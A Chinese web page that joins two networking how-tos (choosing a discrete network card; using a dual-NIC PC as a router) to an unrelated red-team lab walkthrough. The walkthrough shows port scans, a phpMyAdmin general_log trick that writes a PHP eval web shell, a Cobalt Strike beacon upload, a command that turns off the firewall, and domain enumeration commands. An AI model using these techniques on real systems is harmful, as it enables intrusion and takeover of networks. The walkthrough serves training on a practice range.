卡是電腦必備的硬件接口之一,是可以上網沖浪的前提。一般情況下,移動終端(手機、PAD等設備)多用的是無線網卡,PC端以主板上的網卡為主。目前主流的網卡都是千兆的,很多主板也都將高性能網卡作為賣點之一,甚至部分高端主板集成了2.5G網卡,這類集成網卡性能也非常優秀。如無其他需求,不用考慮升級獨立網卡。
獨立網卡
那么,什么情況下,我們需要換掉集成網卡或者加裝獨立網卡呢?
現在的百兆以上寬帶越來越普及,再加上今年的攜號轉網政策下達,三大運營商針對寬帶的資費將會下降到一定程度。盡管千兆寬帶現在還未能全面普及,但是百兆網卡在處理百兆寬帶時具有明顯的瓶頸。為什么會有瓶頸呢?因為百兆網卡處理百兆寬帶只是理論值,在實際使用中,不僅有信號衰減,而且設備基本實時不可能滿負載工作(超過80%就很費勁了),就會導致你的百兆寬帶經過百兆網卡傳輸后,實際能用的帶寬最大能到值在80-90之間。
千兆網卡
此外,在日常生活工作中,很多情況都會用到兩根網線。尤其是在很多場合,局域網和公網的之間的切換或者共存很有必要。對于局域網來說,在訪問網絡時都有諸多限制。然而很多時候不得不使用局域網,在使用局域網完畢之后,若想切回公網,在普通主板默認都只有一個網口的情況下,只能通過插拔網線的方式去更換,十分麻煩。
主板單網卡
高端雙網卡主板
因此,如果你的寬帶已經不小于百兆,而主板搭載的卻是百兆網卡,或者你需要頻繁的在兩個網絡之間進行切換,那么加裝一個千兆獨立網卡就是更好的選擇。同時,雙網卡通過橋接的方式,還可以共存,不會出現網絡沖突的情況。
眾所周知,PCIE插槽具備優秀的擴充外設基因,而當下的主板基本都使用的是PCIE 3.0協議, PCIe 3.0協議的每一條Lane可支持984.6 MB/s 的速率。我們使用1x的千兆網卡,接在主板上PCIE的插槽上就可以了,常見的四種插槽均可以接入。
PCIE 3.0速率圖示
有些小伙伴只是希望網絡共用,那我們還有通過加裝無線網卡的方式來取代獨立網卡。有些人會覺得無線網卡安裝在臺式機內會有信號屏蔽等副作用。其實,一般與臺式機配備的無線網卡,都會有延長線將天線放在主機外,完全不用擔心。而且,如果你使用的最新的intel 300系列主板,且支持CNVI網絡技術,可以考慮優先選購intel專用網絡模塊,安裝到M.2無線網卡接口。因為M.2接口一般至少連著PCIE的兩條lane,相比較一條lane的普通PCIE 獨立網卡來說,網絡速度和性能都會更強。
無線網卡模塊
作為一名數碼科技愛好者,旨在為小伙伴們科普更多小知識,喜歡內容的話,關注一下唄。你當前有使用獨立網卡嗎?使用的用途是什么?不妨一起聊聊。
日常家庭網絡使用中,遇到原本只有一臺電腦使用網絡的情況,這樣都是用電腦直接來連接網絡的,并沒有安裝路由器,但后續增加了電腦或者有移動設備需要用到網絡,但手頭并沒有現成的路由器,或者想要節省路由器的費用,那么是否可以將電腦改造成有路由器的功能呢?答案當然是肯定的。
下面分幾種情況來看看怎么做吧
這種情況的接線方法是一個網卡連接外網,一個網卡連接其它需要上網的電腦
雙網卡電腦當路由器用
雙網卡電腦設置:先將網卡1連接好外網設置好能上網的情況,然后在網卡1上右鍵屬性,選擇共享進行設置
網絡共享設置
然后確定可以看到如下提示,點擊是,
另外需要上網的電腦設置:設置ip地址為 192.168.137.2 掩碼 255.255.255.0 網關 192.168.137.1, dns可從主電腦獲取,如此即可正常上網了。
延伸:網卡2接交換機的話,后面所有電腦配置都是以192.168.137.1為網關即可。
還有一種方法可以進行網絡共享,先將連接外網的網卡設置好可以正常上網,
然后將連接外網的電腦的兩塊網卡進行橋接,如下圖所示,
雙網卡進行橋接
windows正在生成網橋
橋接完成后生成網橋
橋接完成后,將另一臺電腦的ip設置成跟網橋同段網絡,并將網關設置為網橋的ip地址即可完成上網設置。
這種方法跟上面情況略有不同,主要設置方法如下:
有線網卡設置:連接到外網,設置好上網。
無線網卡設置:進行虛擬wifi共享設置,打開開始菜單——運行——cmd, 輸入如下命令即可:
虛擬wifi設置
將有線網卡的網絡共享給虛擬wifi連接,
設置虛擬wifi的網絡
設置完成后,筆記本的無線網卡就成了一個wifi,可以供移動設備等連接wifi來上網。
電腦單網卡+外裝一個無線網卡也可以跟上面同樣設置當wifi使用。
只要有雙網卡,不需要路由器,就可以讓電腦當路由器用,給其他電腦共享網絡。解除沒有路由器的煩惱。
x00:寫在前面
此實戰靶場共3臺主機,先把拓撲圖理清楚。
win7:處于DMZ區域的web服務器,雙網卡(橋接:192.168.0.101,nat:192.168.52.143)
win2K3:內網域成員主機(nat:192.168.52.141)
win2008r2:域控主機(nat:192.168.52.138)
目的就是攻擊者通過拿下和外網相通的win7的shell,進而攻擊win7所處域,獲得域控桌面的flag,也就是敏感文件。
介紹一下:此靶場紅日安全團隊紅隊評估實戰靶場第一關,難度不大,多種姿勢均可獲得域控權限,是練習域滲透各種姿勢很不錯的靶場,搭建方式也非常簡單,配置一下win7為雙網卡,橋接為模擬外網ip,nat模擬內網域環境。配置完雙網卡即可,dhcp方式獲取橋接ip。勿管nat網卡的ip,內網域環境已經搭建好了。ip配置完畢后,三臺虛機密碼均為hongrisec@2019。登錄win7啟動一下phpstudy,測試一下三臺虛機連通性后即可開始本次滲透。
0x01:拿下DMZ區的win7
DMZ區也就是處于兩個防火墻之間的,一個合格的DMZ區是為了提供外部主機訪問內網資源服務器的一個緩沖區域,應該有著嚴格的內外網隔離,本次靶場只是一個模擬,dmz區并沒有很合規。
那么入手以后,先進行信息收集,橋接嘛,那么直接掃一下橋接網段的存活主機,方法多多,筆者比較喜歡用nmap -sP。
也可以netdiscover -i en0 -r 192.168.0.1/24
獲取了目標ip以后,就是掃端口:
nmap -sV -vv -p1-65535 192.168.0.101
訪問80得到一個phpstudy探針。
最下面有個測試mysql連通的。
輸入root/root回顯成功,hh 靶場嘛,很多生產環境中弱口令也是很多的。那么初步getshell思路就是通過mysql拿shell。
dirsearch掃一下目錄發現存在phpmyadmin和beifen.rar
直接登錄phpmyadmin頁面
phpmyadmin頁面getshell方式有兩種:
1:into_outfile寫shell
條件:需要secure_file_priv為允許
并不支持,那就嘗試另一個方式,寫日志getshell。
日志備份獲取shell
show global variables like "%genera%"; //查詢general_log配置
set global general_log='on'; 開啟general log模式
SET global general_log_file='C:/phpStudy/WWW/shell.php'; //設置日志文件保存路徑
SELECT '<?php @eval($_POST['w']);?>'; //phpinfo()寫入日志文件
set global general_log='off'; //關閉general_log模式
shell寫入成功,蟻劍連接即可。
成功getshell。
那么拿shell還有另一種方法就是通過掃出來的備份文件beifen.rar,然后得yxcms的后臺賬號密碼,登錄后臺getshell。yxcms拿shell方法公網上很多,這里不多贅述。主要看如何進行內網漫游。
0x02:內網信息收集
拿到shell以后,有多種選擇,shell上進行信息收集,彈到msf上,彈到cs上,彈到empire上,這里選擇彈到cs上。
起一個cs服務器然后客戶端連接,這里筆者用的是4.0版本。
cs起一個監聽,生成一個windows exe木馬文件,通過蟻劍傳入目標機,再執行下面這句關閉防火墻,不然目標會彈防火墻警告框。
netsh advfirewall set allprofiles state of
shell執行一下exe即可。
執行后成功上線,調整一下心跳,這里為純內網練習,心跳為0即可。
beacon執行:sleep 0
接下來就是信息收集過程。
ipconfig /all
還發現另一個網段ip:192.168.52.143;
且當前主機是存在域內的,初步判斷域名為god.org;
執行:whoami,hostname
查詢系統體系架構:echo %PROCESSOR_ARCHITECTURE%
查詢已安裝的軟件及版本信息:wmic product get name,version
查看當前運行進程:wmic process list brief
當前并無殺軟。
關于域相關信息收集
判斷當前主機是否在域內。
上篇文章已經提供了相關信息收集姿勢,
這里用:net time /domain
說明當前主機確實存在域內,接下來就是確定域控ip。
查看當前域的所有用戶:net user /domain
獲取域內用戶的詳細信息:wmic useraccount get /all
這里會回顯出用戶的SID,對于后續的憑據利用提前做信息收集。
查看域管理員:net group "domain controllers" /domain
再進行ping域控主機即可獲得域控IP:192.168.52.138
查看所有域成員計算機列表:net group "domain computers" /domain
查看本地管理組:net localgroup administrators /domain
查看本地所有用戶:net user
CS也有個探測內網環境功能,這里進行如下選擇:
查看目標得知以下內容,獲知當前內網主機列表,這里通過初步探測,141和143為域內主機,138為域內域控。
也可以通過Ladon這個域信息收集神器來進行存活主機探測。
CS4.0腳本管理器導入Ladon.cna即可,下載地址如下:
https://github.com/rsmudge/ElevateKit
用法:Ladon 192.168.52.0/24 OsScan
Ladon是一個非常了不起的內網信息收集工具。
使用方法詳情見官方文檔:http://k8gege.org/p/648af4b3.html
會顯示出非常詳細的信息,例如版本以及是否為虛擬機。后續可以使用BloodHound進行測繪攻擊路線。
0x03:內網橫向移動
到這里為止,我們已經確定了此靶場的域控ip以及域內基本拓撲圖,接下來就是設置代理進行橫向移動打域控,對于此靶場來說,獲取域控權限方式很多,下一期拿這個靶場進行域內漫游的方法小合集,拿到域控主機桌面的flag。